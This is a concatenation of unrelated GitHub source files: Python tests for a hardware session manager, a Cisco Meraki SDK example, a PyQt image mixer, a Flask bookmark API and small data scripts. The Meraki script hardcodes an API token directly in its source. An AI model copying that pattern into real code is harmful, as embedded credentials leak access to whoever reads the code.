events\n logging.disable(logging.CRITICAL)\n \n def tearDown(self):\n # Reset the recorded configuration values\n self._reset_config_entries()\n \n # Reset the configuration reference\n self.config = None\n \n # Reset the other resource references\n self.device_manager = None\n self.command_parser = None\n\n def test_writing_to_telemetry_protocol(self):\n \"\"\" Tests that the Session class can write telemetry data passed to it to its registered telemetry protocols. 
\n \"\"\"\n\n # First create a test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create some mock telemetry protocols and register them with the session\n test_telem_protocol = MagicMock()\n test_telem_protocol_2 = MagicMock()\n test_session.register_telemetry_protocol(test_telem_protocol)\n test_session.register_telemetry_protocol(test_telem_protocol_2)\n\n # Write a test telemetry datum and verify that the protocols were correctly called\n test_timestamp = int(time.time())\n test_session.write_telemetry(\"session_test\", \"test_stream\", test_timestamp, \"waffles\", test_header=True)\n test_telem_protocol.write_telemetry.assert_called_once_with(\"session_test\", \"test_stream\", test_timestamp, \n \"waffles\", binary=False, test_header=True)\n test_telem_protocol_2.write_telemetry.assert_called_once_with(\"session_test\", \"test_stream\", test_timestamp,\n \"waffles\", binary=False, test_header=True)\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_writing_to_output_protocol(self):\n \"\"\" This test verifies that the Session class can correctly pass pipeline output from the Pipeline class to its \n registered data protocols.\n \"\"\"\n\n # First create a test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create some mock data protocols and register them with the session\n test_data_protocol = MagicMock()\n test_data_protocol_2 = MagicMock()\n test_session.register_data_protocol(test_data_protocol)\n test_session.register_data_protocol(test_data_protocol_2)\n\n # Write some output data and verify that it was passed to the registered streams\n test_session.write_output(\"waffles\")\n test_data_protocol.write_output.assert_called_once_with(\"waffles\")\n test_data_protocol_2.write_output.assert_called_once_with(\"waffles\")\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_writing_to_input_stream(self):\n \"\"\" Checks that the Session class can correctly write input data that it receives to its associated pipeline.\n \"\"\"\n\n # First create a valid test pipeline and mock its write_to_pipeline() method\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.write = MagicMock()\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n 
# Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Write data to the session and verify that it correctly handed it off to the pipeline\n test_session.write(\"waffles\")\n test_pipeline.write.assert_called_once_with(\"waffles\")\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_telemetry_protocol_registration(self):\n \"\"\" Verifies that the Session class can correctly register telemetry protocols. The Session class uses telemetry\n protocols to pass pipeline telemetry data to the end user.\n \"\"\"\n\n # First create a valid test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create and register some mock telemetry protocols\n test_telem_protocol = MagicMock()\n test_telem_protocol_2 = MagicMock()\n test_session.register_telemetry_protocol(test_telem_protocol)\n test_session.register_telemetry_protocol(test_telem_protocol_2)\n\n # Try to register the same protocol twice\n self.assertRaises(session.ProtocolAlreadyRegistered, test_session.register_telemetry_protocol, test_telem_protocol)\n\n # Make sure the protocols were added successfully\n self.assertEqual(test_session.telemetry_protocols[0], test_telem_protocol)\n self.assertEqual(test_session.telemetry_protocols[1], test_telem_protocol_2)\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_data_protocol_registration(self):\n \"\"\" Verifies that the Session class can correctly register data protocols. 
The Session class uses these data\n protocols to pass the primary pipeline output stream to the end user.\n \"\"\"\n\n # First create a valid test pipeline\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Create and register some mock data protocols\n test_data_protocol = MagicMock()\n test_data_protocol_2 = MagicMock()\n test_session.register_data_protocol(test_data_protocol)\n test_session.register_data_protocol(test_data_protocol_2)\n\n # Try to register the same protocol twice\n self.assertRaises(session.ProtocolAlreadyRegistered, test_session.register_data_protocol, test_data_protocol)\n\n # Make sure both protocols were registered successfully\n self.assertEqual(test_session.data_protocols[0], test_data_protocol)\n self.assertEqual(test_session.data_protocols[1], test_data_protocol_2)\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_kill_session(self):\n \"\"\" Tests that sessions can be killed and that they notify their pipelines that the session has ended (to give them\n an opportunity to clean up their resources).\n \"\"\"\n\n # First create a pipeline to test with\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.cleanup_after_session = MagicMock()\n test_pipeline.reserve_pipeline()\n self.assertTrue(test_pipeline.is_active)\n\n # Create a test session\n test_reservation_config = {\n \"reservation_id\": \"TEST_RES\",\n \"user_id\": \"1\"\n }\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Kill the session and make sure the session is in the correct state afterwards\n test_session.kill_session()\n test_pipeline.cleanup_after_session.assert_called_once_with()\n self.assertTrue(not test_pipeline.is_active)\n self.assertTrue(test_session.active_pipeline is None)\n\n def test_session_startup_pipeline_in_use(self):\n \"\"\" Makes sure that the Session class responds appropriately when a session's hardware pipeline can't be reserved.\n \"\"\"\n\n # First create a valid test pipeline and immediately lock it\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.reserve_pipeline()\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_failure):\n # Check if the correct error was generated (caused by a locked pipeline)\n self.assertTrue(isinstance(session_start_failure.value, pipeline.PipelineInUse))\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = 
test_session.start_session()\n session_start_deferred.addErrback(check_results)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_pipeline_setup_command_errors(self):\n \"\"\" Tests that the Session class correctly handles fatal pipeline setup command errors when starting a new session.\n \"\"\"\n\n # First create a pipeline that contains invalid pipeline setup commands (to force an error)\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[2], self.device_manager, self.command_parser)\n\n # Create the expected mock services\n test_tracker_service = MagicMock()\n test_tracker_service.id = \"sgp4\"\n test_tracker_service.type = \"tracker\"\n test_pipeline.register_service(test_tracker_service)\n test_logger_service = MagicMock()\n test_logger_service.id = \"basic\"\n test_logger_service.type = \"logger\"\n test_pipeline.register_service(test_logger_service)\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_failure, test_session):\n # Check if the correct error was generated (caused by a failed pipeline setup command)\n self.assertTrue(isinstance(session_start_failure.value, parser.CommandFailed))\n\n # Make sure the session is not active\n self.assertTrue(not test_session.is_active)\n\n # Make sure that the pipeline was freed after the error\n self.assertTrue(not test_pipeline.is_active)\n for temp_device in test_pipeline.devices:\n # Try to lock the devices, if this fails then something wasn't unlocked correctly\n test_pipeline.devices[temp_device].reserve_device()\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.5')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addErrback(check_results, test_session)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_error_during_device_session_preparation(self):\n \"\"\" Verifies that the session class can correctly handle errors that may occur during device prepare_for_session()\n method calls; such errors are supposed to be fatal to the session.\n \"\"\"\n\n # Create a mock method that will raise an error\n def mock_prepare_for_session(session_pipeline):\n raise TestSessionError\n\n # First create a pipeline to run the session on and replace some of its device's methods for testing\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n test_pipeline.devices[\"test_device4\"].prepare_for_session = mock_prepare_for_session\n\n # Define an errback to check the results of the session start procedure\n def check_results(session_start_failure):\n self.assertTrue(isinstance(session_start_failure.value, TestSessionError))\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # 
Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.3')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addErrback(check_results)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_no_session_setup_commands(self):\n \"\"\" Tests that the Session class can correctly start a session that doesn't specify any session setup commands.\n \"\"\"\n\n # First create a pipeline to run the session on and replace some of its device's methods for testing\n test_pipeline = pipeline.Pipeline(self.config.get('pipelines')[0], self.device_manager, self.command_parser)\n for device_id in test_pipeline.devices:\n test_pipeline.devices[device_id].prepare_for_session = MagicMock()\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_results, test_session):\n self.assertEqual(session_start_results, None)\n\n # Verify that the prepare_for_session() method was called on each of the pipeline's devices\n for device_id in test_pipeline.devices:\n test_pipeline.devices[device_id].prepare_for_session.assert_called_once_with(test_pipeline)\n\n # Make sure the session is active\n self.assertTrue(test_session.is_active)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Find the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.3')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addCallback(check_results, test_session)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def test_session_startup_setup_commands_mixed_success(self):\n \"\"\" Tests that the Session class can correctly start a session based on a reservation that specifies some valid, and\n invalid, session setup commands. Because session setup command errors are considered non-fatal, invalid commands \n should still leave the session in a running state. 
This test also verifies that the session: \n * Correctly registers itself with its pipeline (which occurs right before the session setup commands are executed)\n * Successfully executes a valid device command that requires a session for the test pipeline.\n * Fails to execute a device command that specifies a device the user doesn't have permission to execute.\n \"\"\"\n\n # Setup the pipeline manager and load the test pipeline\n self.pipeline_manager = pipeline_manager.PipelineManager(self.device_manager, self.command_parser)\n test_pipeline = self.pipeline_manager.get_pipeline(\"test_pipeline\")\n\n # Define a callback to check the results of the session start procedure\n def check_results(session_start_results, test_session):\n # Make sure that the session registered itself with its pipeline\n self.assertTrue(test_pipeline.current_session is test_session)\n\n # Make sure that the first setup command correctly executed\n self.assertTrue(session_start_results[0][0])\n self.assertTrue('timestamp' in session_start_results[0][1]['response']['result'])\n\n # Make sure that the second command failed as expected\n self.assertTrue(not session_start_results[1][0])\n self.assertTrue(isinstance(session_start_results[1][1].value, parser.CommandFailed))\n\n # Make sure that the third command (a valid device command) executed correctly\n self.assertTrue(session_start_results[2][0])\n self.assertTrue('some_results' in session_start_results[2][1]['response']['result'])\n\n # Make sure that the fourth command (a device command that the user doesn't have permission for) didn't execute\n self.assertTrue(not session_start_results[3][0])\n self.assertTrue(isinstance(session_start_results[3][1].value, parser.CommandFailed))\n\n # Make sure the session is active\n self.assertTrue(test_session.is_active)\n\n # Define a callback to continue the test after the schedule has been loaded\n def continue_test(reservation_schedule):\n # Load the reservation that we want to test with\n test_reservation_config = self._load_reservation_config(reservation_schedule, 'RES.2')\n\n # Create a new session\n test_session = session.Session(test_reservation_config, test_pipeline, self.command_parser)\n\n # Start the session\n session_start_deferred = test_session.start_session()\n session_start_deferred.addCallback(check_results, test_session)\n\n return session_start_deferred\n\n # Now load up a test schedule to work with\n schedule_update_deferred = self._load_test_schedule()\n schedule_update_deferred.addCallback(continue_test)\n\n return schedule_update_deferred\n\n def _load_test_schedule(self):\n \"\"\" Loads a valid test schedule and returns a deferred that will be fired once that schedule has been loaded and \n parsed. 
This schedule is used to test the Session class.\n \"\"\"\n\n # Load a valid test schedule\n schedule_manager = schedule.ScheduleManager(self.source_data_directory+'/sessions/tests/data/test_schedule_valid.json')\n schedule_update_deferred = schedule_manager.update_schedule()\n\n return schedule_update_deferred\n\n def _load_reservation_config(self, reservation_schedule, reservation_id):\n \"\"\" Returns the configuration dictionary for the specified reservation ID from the complete reservation schedule.\n This is used to pick out individual session configurations to test with.\n\n @throw Raises LookupError if the specified reservation ID can't be found in the reservation schedule.\n \"\"\"\n\n # Parse out the specific reservation configuration\n test_reservation_config = None\n for temp_reservation in reservation_schedule['reservations']:\n if temp_reservation['reservation_id'] == reservation_id:\n test_reservation_config = temp_reservation\n return test_reservation_config\n\n raise LookupError(\"Specified reservation '\"+reservation_id+\"' was not found in the provided reservation schedule.\")\n\n def _reset_config_entries(self):\n # Reset the recorded configuration entries\n self.config.options = {}\n self.config.user_options = {}\n\nclass TestSessionError(Exception):\n pass\n","repo_name":"MichiganExplorationLab/Mercury2-HWM","sub_path":"hwm/sessions/tests/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":23129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13467117993","text":"\"\"\"\nThis Example Focuses on Cisco Meraki via the sandbox at\nhttps://devnetsandbox.cisco.com/RM/Diagram/Index/f381be67-d43c-4fc7-977d-0979b04d64cd\nObjective:\n Utilize the platform via the meraki sdk\n\"\"\"\n\nimport meraki\nimport json\nfrom pprint import pprint\n\nauth_token = \"02a3afda271cb9f7106265011bb49f216880332c\"\n\ndashboard_api = meraki.DashboardAPI(auth_token)\n\n\ndef get_org_list():\n organizations = dashboard_api.organizations.getOrganizations()\n return organizations\n\n\ndef get_org_networks(org_id):\n org_networks = dashboard_api.organizations.getOrganizationNetworks(organizationId=org_id)\n return org_networks\n\n\ndef get_network_devices(network_id):\n net_devs = dashboard_api.networks.getNetworkDevices(network_id)\n return net_devs\n\n\ndef display_all_devices(networks):\n for value in networks:\n print(f'{value[\"name\"]}')\n devices = get_network_devices(value['id'])\n pprint(devices)\n return\n\n\ndef update_net(net_id, name):\n update = dashboard_api.networks.updateNetwork(networkId=net_id, name=name)\n return update\n\n\ndef update_net_dev(net_id, serial):\n # NOTE: the net_id and serial arguments are currently unused; the device serial below is hardcoded\n update = dashboard_api.devices.updateDevice(\n 'Q2HP-Q9S8-BVHB',\n name=\"SWITCH_12_28\",\n tags=['Test1', 'Test2']\n )\n return update\n\n\ndef get_device_lldp_cdp(serial):\n data = dashboard_api.devices.getDeviceLldpCdp(serial=serial)\n pprint(data)\n return\n\n\ndef main():\n org_id = get_org_list()[0]['id']\n org_networks = get_org_networks(org_id)\n update_net_dev(None, None)\n for value in org_networks:\n if value['name'] == 'TheBoys':\n devices = get_network_devices(value['id'])\n # update_net(value['id'], \"TheBoys\")\n # update_net_dev(value['id'], value['serial'])\n pprint(devices)\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MFalaqIqbal/DevNet_learning","sub_path":"devnet_code/3.0_Cisco_Platforms_and_Development/Cisco 
Meraki/example_2.py","file_name":"example_2.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"25484499376","text":"from PyQt5.QtWidgets import QFileDialog, QLabel, QMessageBox\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom ImgModel import ImageModel\nfrom Modes import Modes\nimport numpy as np\nimport logging\nimport UI\nimport sys\nimport cv2\n\n# Create and configure logger\nlogging.basicConfig(level=logging.DEBUG,\n filename=\"app.log\",\n format='%(lineno)s - %(levelname)s - %(message)s',\n filemode='w')\n# Creating an object\nlogger = logging.getLogger()\n\nclass ImageMixer(UI.Ui_MainWindow):\n\n def __init__(self,MainWindow):\n super(ImageMixer,self).setupUi(MainWindow) \n \n def open(self, flag):\n \n logger.info(\"Browsing the files...\")\n repo_path = \"images\"\n self.filepath[flag], _ = QtWidgets.QFileDialog.getOpenFileName(None, \"Load Image\", repo_path,\n \"*.jpg;;\" \"*.jpeg;;\" \"*.png;;\")\n self.path = self.filepath[flag]\n logger.info(\"Image\"+str(flag+1)+\" opened correctly\")\n self.img = cv2.cvtColor(cv2.imread(self.path), cv2.COLOR_BGR2GRAY)\n self.images[flag] = ImageModel(self.path)\n self.showComponent[flag].setCurrentIndex(0)\n self.img_viewers[flag+2].clear()\n self.view_image(self.img, flag)\n self.check_size()\n logger.info(\"Image\"+str(flag+1)+\" is ploted\")\n\n\n def check_size(self):\n if self.images[0] != [] and self.images[1] != []:\n if self.images[0].imgShape != self.images[1].imgShape:\n self.enable(False)\n msg = QMessageBox()\n msg.setWindowTitle(\"Warning\")\n msg.setText(\"The two images are of different size\")\n logger.warning(\"The two images are of different size\")\n msg.setIcon(QMessageBox.Warning)\n msg.exec_()\n else:\n self.enable(True)\n\n def view_image(self, data, imgflag):\n self.img_viewers[imgflag].setImage((data).T)\n self.img_viewers[imgflag].view.setRange(xRange=[0, self.images[0].imgShape[0]], yRange=[0, self.images[0].imgShape[1]],\n padding=0)\n self.img_viewers[imgflag].view.setAspectLocked(False)\n logger.info(\"Data is ploted\")\n\n def img_options(self, imgflag):\n if self.showComponent[imgflag].currentText() == \"Magnitude\":\n self.data = self.images[imgflag].magnitude2\n logger.info(\"Magnitude has been selected\")\n elif self.showComponent[imgflag].currentText() == \"Phase\":\n self.data = self.images[imgflag].phase\n logger.info(\"Phase has been selected\")\n elif self.showComponent[imgflag].currentText() == \"Real\":\n self.data = self.images[imgflag].real2\n logger.info(\"Real has been selected\")\n elif self.showComponent[imgflag].currentText() == \"Imaginary\":\n self.data = self.images[imgflag].imaginary\n logger.info(\"Imaginary has been selected\")\n else:\n logger.warning(\"No component has been selected\") \n self.view_image(self.data, imgflag+2)\n\n def mix_options(self, flag=0):\n for n in range(2):\n self.Percentage[n].setText(\"{}%\".format(self.sliders[n].value()))\n self.Data = []\n if flag==1:\n self.comboxox_setitems()\n for i in range(2):\n if self.combobox_mixer[self.image_no[i]].currentText() == \"Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[i].value(), self.sliders[not(i)].value(), Modes.magnitude_Phase)\n logger.info(\"Mix magnitude of image\"+str(\n self.image_no[i]+1)+\" and phase of image\" + str((self.image_no[not(i)])+1))\n\n elif 
self.combobox_mixer[self.image_no[i]].currentText() == \"Real\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Imaginary\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[not(self.image_no[i])].value(), Modes.real_Imaginary)\n logger.info(\"Mix real of image\"+str(\n self.image_no[i]+1)+\" and Imaginary of image\" + str((self.image_no[not(i)])+1))\n\n elif self.combobox_mixer[self.image_no[i]].currentText() == \"Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Uni Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[not(self.image_no[i])].value(), Modes.magnitude_UniPhase)\n logger.info(\"Mix magnitude of image\"+str(\n self.image_no[i]+1)+\" and uniphase of image\" + str((self.image_no[not(i)])+1))\n\n elif self.combobox_mixer[self.image_no[i]].currentText() == \"Uni Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[1].value(), Modes.Unimagnitude_Phase)\n logger.info(\"Mix unimagnitude of image\"+str(\n self.image_no[i]+1)+\" and phase of image\" + str((self.image_no[not(i)])+1))\n\n elif self.combobox_mixer[self.image_no[i]].currentText() == \"Uni Magnitude\" and self.combobox_mixer[not(self.image_no[i])].currentText() == \"Uni Phase\":\n self.Data = self.images[self.image_no[i]].mix(self.images[not(\n self.image_no[i])], self.sliders[self.image_no[i]].value(),\n self.sliders[1].value(), Modes.uniMag_uniPhase)\n logger.info(\"Mix unimagnitude of image\"+str(\n self.image_no[i]+1)+\" and uniphase of image\" + str((self.image_no[not(i)])+1))\n\n else:\n logger.warning(\"Unavailable Mode\")\n\n if len(self.Data) > 0:\n self.view_image(self.Data, self.output_no+4)\n logger.info(\"Mode is selected\")\n else:\n logger.warning(\"No Mode is selected\")\n\n def Mixer_img(self, boxflag):\n if self.Select_image[boxflag].currentText() == \"Image 1\":\n self.image_no[boxflag] = 0\n logger.info(\"Image1 is selected as input\"+str(boxflag+1))\n if self.Select_image[boxflag].currentText() == \"Image 2\":\n self.image_no[boxflag] = 1\n logger.info(\"Image is selected as input\"+str(boxflag+1))\n\n def output_img(self):\n if self.output.currentText() == \"Output 1\":\n self.output_no = 0\n logger.info(\"Display mixed image in output1\")\n if self.output.currentText() == \"Output 2\":\n self.output_no = 1\n logger.info(\"Display mixed image in output2\")\n\n def comboxox_setitems(self):\n self.combobox_mixer[1].clear()\n if self.combobox_mixer[0].currentText() == \"Magnitude\" or self.combobox_mixer[0].currentText() == \"Uni Magnitude\":\n self.combobox_mixer[1].addItem(\"Phase\")\n self.combobox_mixer[1].addItem(\"Uni Phase\")\n elif self.combobox_mixer[0].currentText() == \"Phase\" or self.combobox_mixer[0].currentText() == \"Uni Phase\":\n self.combobox_mixer[1].addItem(\"Magnitude\")\n self.combobox_mixer[1].addItem(\"Uni Magnitude\")\n elif self.combobox_mixer[0].currentText() == \"Real\":\n self.combobox_mixer[1].addItem(\"Imaginary\")\n elif self.combobox_mixer[0].currentText() == \"Imaginary\":\n self.combobox_mixer[1].addItem(\"Real\")\n logger.info(\"Combobox Itemtext changed\")\n\n\ndef main():\n \"\"\"\n the application startup functions\n :return:\n \"\"\"\n app = 
QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = ImageMixer(MainWindow)\n MainWindow.show()\n\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"Youssef-Elkaheil/Task-3","sub_path":"Part A/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43550031036","text":"# to structure the application we create the src folder\n# the src folder will hold all of the source code\n# -> config will hold the database configurations and all the models we will work with\n# -> constants will hold some variables that we do not want to change\n# -> static will hold files such as css, images, js, etc.\n# -> templates will hold the html files\n# -> services will hold the configuration for services, e.g. the email service\n# -> tests will hold the tests, e.g. unittest\n# blueprints are meant to group related functionality together\n\n\nimport os\n\nfrom flask import Flask, redirect\nfrom flask.json import jsonify\nfrom src.auth import auth\nfrom src.bookmark import bookmark\nfrom src.database import db, Bookmark\nfrom flask_jwt_extended import JWTManager\nfrom src.constants.http_status_codes import HTTP_404_NOT_FOUND, HTTP_500_INTERNAL_SERVER_ERROR\nfrom flasgger import Swagger, swag_from # swag_from attaches a yaml spec file to a view\nfrom src.config.swagger import template, swagger_config\n\n\n# this factory function creates the application, sets some configuration and migrates the tables to the database\ndef create_app(test_config=None):\n\n # this parameter tells Flask that we have some instance configuration\n app = Flask(__name__, instance_relative_config=True)\n\n # if no test configuration is passed in, define the configuration here\n if test_config is None:\n\n # update the configuration with this function\n app.config.from_mapping(SECRET_KEY=os.getenv('SECRET_KEY'),\n SQLALCHEMY_DATABASE_URI=os.getenv('SQLALCHEMY_DATABASE_URI'),\n SQLALCHEMY_TRACK_MODIFICATIONS=os.getenv('SQLALCHEMY_TRACK_MODIFICATIONS'),\n FLASK_APP=os.environ.get('FLASK_APP'),\n JWT_SECRET_KEY=os.getenv('JWT_SECRET_KEY'),\n SWAGGER={\n \"title\": \"Bookmark\",\n \"uiversion\":3\n })\n\n else:\n # if a configuration was provided, take it from the test_config parameter\n app.config.from_mapping(test_config)\n\n # after creating the blueprints we register them\n app.register_blueprint(auth)\n app.register_blueprint(bookmark)\n\n # by the time we return the app the jwt manager will be configured\n JWTManager(app) # encrypt and decrypt Tokens\n\n Swagger(app, config=swagger_config, template=template)\n\n # register the db\n db.app = app\n db.init_app(app)\n\n # for \"things\" to work we define these view functions inside create_app() and make the src folder the entry point\n @app.route('/index')\n @app.route('/')\n def index():\n return \"Hello World\"\n\n @app.route('/hello')\n def say_hello():\n return {'hello': 'world'}\n\n # this view function counts the visits to the short url and redirects us to the full url\n @app.route('/<short_url>', methods=['GET'])\n @swag_from(\"./docs/bookmark/short_url.yaml\")\n def redirect_to_url(short_url):\n bookmark = Bookmark.query.filter_by(short_url=short_url).first_or_404()\n\n if bookmark:\n bookmark.visits += 1\n db.session.commit()\n\n return redirect(bookmark.url)\n\n @app.errorhandler(HTTP_404_NOT_FOUND)\n def handle_404(e): # every error handler must take an exception as an argument\n return jsonify({\n \"Message\": \"Error 404! 
Page not found!\"\n }), HTTP_404_NOT_FOUND\n\n\n @app.errorhandler(HTTP_500_INTERNAL_SERVER_ERROR)\n def handle_500(e):\n return jsonify({\n \"Message\": \"Internal Server Error! We are working on it!\"\n }), HTTP_500_INTERNAL_SERVER_ERROR\n\n\n db.create_all()\n\n return app\n\n\nif __name__ == \"__main__\":\n create_app()\n\n# Steps (https://www.youtube.com/watch?v=WFzRy8KVcrM)\n# 1. Project introduction and demo\n# 2. Project setup\n# 3. Flask API folder structure\n# 4. Flask API Blueprints\n# 5. Database and Models setup\n# 6. HTTP Status Codes\n# 7. User Registration\n# 8. User Login\n# 9. Route Protection\n# 10. Refresh Token\n# 11. Create and Retrieve Records ( C R )\n# 12. Pagination\n# 13. Retrieve One\n# 14. Editing Items ( U )\n# 15. Deleting Items ( D )\n# 16. User Link Click Tracking\n# 17. Error Handling\n# 18. Get Link Stats\n# 19. Swagger Documentation (how the api is structured and how it should be accessed - Flasgger (an automatic documentation tool))\n # -> pip install flasgger\n # -> config -> swagger.py\n # -> create yaml files and decorate view functions with the swag_from decorator\n # -> /apispec.json ---> makes it possible to export this documentation, e.g. in Postman -> File -> Import\n# 20. Heroku Deployment","repo_name":"mauranmango/bookmark-api","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23323054728","text":"# pseudocode\n# 1. create 2 new lists\n# 2. iterate over the given data\n# 3. append to the 2 lists created respectively\n# 4. feed the data to pygal\n\ndata = [\n {'month':'January','total':22},\n {'month':'February','total':27},\n {'month':'March','total':23},\n {'month':'April','total':20},\n {'month':'May','total':12},\n]\nx=[]\ny=[]\nfor each in data:\n #print(each['month'])\n x.append(each['month'])\n y.append(each['total'])\nprint(x)\nprint(y)","repo_name":"Ofucho/flask","sub_path":"templates/months.py","file_name":"months.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20332901896","text":"from brain import *\nfrom memory import *\nimport math\nimport numpy as np # needed for np.random / np.argmax below\n\nclass Skiier:\n def __init__(self, action_space, LEARNING_RATE, GAMMA, LAMBDA, MEMORY_CAPACITY, BATCH_SIZE, max_explore_game, repeat_freq):\n #Hyperparameters\n self.MEMORY_CAPACITY = MEMORY_CAPACITY\n self.BATCH_SIZE = BATCH_SIZE\n self.GAMMA = GAMMA\n self.MAX_EPSILON = 1\n self.MIN_EPSILON = 0.01\n self.LAMBDA = LAMBDA\n self.repeat_freq = repeat_freq\n #Initialization\n self.action_space = action_space\n 